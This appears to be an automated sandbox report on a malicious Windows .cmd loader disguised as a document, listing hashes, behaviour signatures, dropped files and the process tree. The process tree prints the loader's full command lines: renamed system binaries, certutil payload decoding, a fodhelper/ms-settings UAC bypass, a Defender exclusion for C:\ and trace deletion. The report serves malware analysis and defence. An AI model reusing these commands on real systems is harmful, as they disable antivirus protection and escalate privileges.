Analysis
max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 15-05-2024 08:48
Static task: static1
Behavioral task: behavioral1
Sample: doc023561361500.cmd
Resource: win7-20240508-en
General
Target: doc023561361500.cmd
Size: 4.9MB
MD5: d05bed0572c3ce597f3b4be7a2606c08
SHA1: f621468b397308f1055afaf2f27814a390eb16ea
SHA256: e84dd67c7831168c1d7a0f11a78d1e0497eb1cfa8689b25b291ee4b1b96826a4
SHA512: 4fbe7a932d91882491648b489ec1e2c349ec71423c071e3f751c130e51ae62881473a9feaf3d842c60ed2fb6922b59f0b611491145e84b07e7145efb0ca7ec79
SSDEEP: 24576:sYkuWvLHtSs/yfVZIC5z65HTGq42xfcJele9P2dxBJGhRC8Ih:sYkuWTcDXB65HPxfhleljIh
Malware Config
Signatures
Executes dropped EXE (24 IoCs)
Processes:
  pid   process
  2892  alpha.exe
  2164  alpha.exe
  2744  alpha.exe
  2964  alpha.exe
  2616  kn.exe
  2680  alpha.exe
  2828  alpha.exe
  2712  alpha.exe
  2788  alpha.exe
  2324  xkn.exe
  2168  alpha.exe
  496   ger.exe
  2124  alpha.exe
  1664  kn.exe
  1572  alpha.exe
  2192  Ping_c.pif
  1212  alpha.exe
  2644  alpha.exe
  1648  alpha.exe
  1628  alpha.exe
  1600  alpha.exe
  1972  alpha.exe
  1964  alpha.exe
  1968  alpha.exe
Loads dropped DLL (15 IoCs)
Processes:
  pid   process
  2180  cmd.exe
  2180  cmd.exe
  2180  cmd.exe
  2180  cmd.exe
  2964  alpha.exe
  2180  cmd.exe
  2180  cmd.exe
  2180  cmd.exe
  2180  cmd.exe
  2788  alpha.exe
  2324  xkn.exe
  2324  xkn.exe
  2168  alpha.exe
  1208  WerFault.exe
  1208  WerFault.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoCs)
Processes:
  pid   pid_target  process       target process
  1208  2192        WerFault.exe  Ping_c.pif
Kills process with taskkill (1 IoCs)
Processes:
  pid   process
  2696  taskkill.exe
Modifies registry class (5 IoCs)
Processes:
  - Key created: \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open (ger.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" (ger.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command (ger.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings (ger.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell (ger.exe)
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes:
  pid   process
  2192  Ping_c.pif
Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
  pid   process
  2324  xkn.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description               pid   process
  Token: SeDebugPrivilege   2324  xkn.exe
  Token: SeDebugPrivilege   2696  taskkill.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
  description                         pid   process    target process
  PID 2180 wrote to memory of 1184    2180  cmd.exe    extrac32.exe
  PID 2180 wrote to memory of 1184    2180  cmd.exe    extrac32.exe
  PID 2180 wrote to memory of 1184    2180  cmd.exe    extrac32.exe
  PID 2180 wrote to memory of 2892    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2892    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2892    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2164    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2164    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2164    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2744    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2744    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2744    2180  cmd.exe    alpha.exe
  PID 2744 wrote to memory of 1152    2744  alpha.exe  extrac32.exe
  PID 2744 wrote to memory of 1152    2744  alpha.exe  extrac32.exe
  PID 2744 wrote to memory of 1152    2744  alpha.exe  extrac32.exe
  PID 2180 wrote to memory of 2964    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2964    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2964    2180  cmd.exe    alpha.exe
  PID 2964 wrote to memory of 2616    2964  alpha.exe  kn.exe
  PID 2964 wrote to memory of 2616    2964  alpha.exe  kn.exe
  PID 2964 wrote to memory of 2616    2964  alpha.exe  kn.exe
  PID 2180 wrote to memory of 2680    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2680    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2680    2180  cmd.exe    alpha.exe
  PID 2680 wrote to memory of 2668    2680  alpha.exe  extrac32.exe
  PID 2680 wrote to memory of 2668    2680  alpha.exe  extrac32.exe
  PID 2680 wrote to memory of 2668    2680  alpha.exe  extrac32.exe
  PID 2180 wrote to memory of 2828    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2828    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2828    2180  cmd.exe    alpha.exe
  PID 2828 wrote to memory of 2824    2828  alpha.exe  extrac32.exe
  PID 2828 wrote to memory of 2824    2828  alpha.exe  extrac32.exe
  PID 2828 wrote to memory of 2824    2828  alpha.exe  extrac32.exe
  PID 2180 wrote to memory of 2712    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2712    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2712    2180  cmd.exe    alpha.exe
  PID 2712 wrote to memory of 2496    2712  alpha.exe  extrac32.exe
  PID 2712 wrote to memory of 2496    2712  alpha.exe  extrac32.exe
  PID 2712 wrote to memory of 2496    2712  alpha.exe  extrac32.exe
  PID 2180 wrote to memory of 2788    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2788    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2788    2180  cmd.exe    alpha.exe
  PID 2788 wrote to memory of 2324    2788  alpha.exe  xkn.exe
  PID 2788 wrote to memory of 2324    2788  alpha.exe  xkn.exe
  PID 2788 wrote to memory of 2324    2788  alpha.exe  xkn.exe
  PID 2324 wrote to memory of 2168    2324  xkn.exe    alpha.exe
  PID 2324 wrote to memory of 2168    2324  xkn.exe    alpha.exe
  PID 2324 wrote to memory of 2168    2324  xkn.exe    alpha.exe
  PID 2168 wrote to memory of 496     2168  alpha.exe  ger.exe
  PID 2168 wrote to memory of 496     2168  alpha.exe  ger.exe
  PID 2168 wrote to memory of 496     2168  alpha.exe  ger.exe
  PID 2180 wrote to memory of 2124    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2124    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 2124    2180  cmd.exe    alpha.exe
  PID 2124 wrote to memory of 1664    2124  alpha.exe  kn.exe
  PID 2124 wrote to memory of 1664    2124  alpha.exe  kn.exe
  PID 2124 wrote to memory of 1664    2124  alpha.exe  kn.exe
  PID 2180 wrote to memory of 1572    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 1572    2180  cmd.exe    alpha.exe
  PID 2180 wrote to memory of 1572    2180  cmd.exe    alpha.exe
  PID 1572 wrote to memory of 2696    1572  alpha.exe  taskkill.exe
  PID 1572 wrote to memory of 2696    1572  alpha.exe  taskkill.exe
  PID 1572 wrote to memory of 2696    1572  alpha.exe  taskkill.exe
  PID 2180 wrote to memory of 2192    2180  cmd.exe    Ping_c.pif
Processes
(process tree; nesting follows the depth recorded for each process, with its command line and triggered signatures listed beneath it)

- C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\extrac32.exe (depth 2)
    Command line: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe (depth 3)
      Command line: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Users\Public\kn.exe (depth 3)
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
      Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe (depth 3)
      Command line: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe (depth 3)
      Command line: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe (depth 3)
      Command line: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
    Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Users\Public\xkn.exe (depth 3)
      Command line: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
      Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Public\alpha.exe (depth 4)
        Command line: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
        - C:\Users\Public\ger.exe (depth 5)
          Command line: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
          Signatures: Executes dropped EXE; Modifies registry class
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Users\Public\kn.exe (depth 3)
      Command line: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
      Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe (depth 3)
      Command line: taskkill /F /IM SystemSettings.exe
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Public\Libraries\Ping_c.pif (depth 2)
    Command line: C:\Users\Public\Libraries\Ping_c.pif
    Signatures: Executes dropped EXE; Suspicious behavior: CmdExeWriteProcessMemorySpam
    - C:\Windows\SysWOW64\WerFault.exe (depth 3)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 724
      Signatures: Loads dropped DLL; Program crash
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
    Signatures: Executes dropped EXE
  - C:\Users\Public\alpha.exe (depth 2)
    Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
    Signatures: Executes dropped EXE
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
- C:\Users\Public\Libraries\Ping_c.pif
  Filesize: 1.7MB
  MD5: ba58a19a6475eff2c5bb9b6dfc7d9dd3
  SHA1: 407eda96d6cc766e17a6a27cf37cc63dd82537f3
  SHA256: 22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57
  SHA512: 6e53a2642c36cddc8cad22ca898c358d3393bd0a880fb5d364cb4aa38ef200b9b0b06dd03a13d05ef91e9867cb172eb2e05a021f0b28282028f8a1eaacdaf9e0
- C:\Users\Public\Ping_c.mp4
  Filesize: 3.4MB
  MD5: c5d58251c6989580fcf2b5d75ea57467
  SHA1: 1b5c775600d8aa1e247574a9ff8620a3c2e74347
  SHA256: 36df0e80ac34f848b1934565413598f7c2087a81e6e4bd69de10be2f86ed15ee
  SHA512: 9efdb53e6902716f1e4ee794dd1e315080817c6eb8045f8a2c62478fb05d8aae7d53b3a8595842f319f49c8075f7522341feea66a47b0f438690905e405c76fc
- C:\Users\Public\ger.exe
  Filesize: 73KB
  MD5: 9d0b3066fe3d1fd345e86bc7bcced9e4
  SHA1: e05984a6671fcfecbc465e613d72d42bda35fd90
  SHA256: 4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
  SHA512: d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
- \Users\Public\alpha.exe
  Filesize: 337KB
  MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
  SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
  SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
  SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
- \Users\Public\kn.exe
  Filesize: 1.1MB
  MD5: ec1fd3050dbc40ec7e87ab99c7ca0b03
  SHA1: ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
  SHA256: 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
  SHA512: 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
- \Users\Public\xkn.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- memory/2192-71-0x0000000000400000-0x00000000005B9000-memory.dmp
  Filesize: 1.7MB
- memory/2324-43-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
  Filesize: 2.9MB
- memory/2324-44-0x0000000001D30000-0x0000000001D38000-memory.dmp
  Filesize: 32KB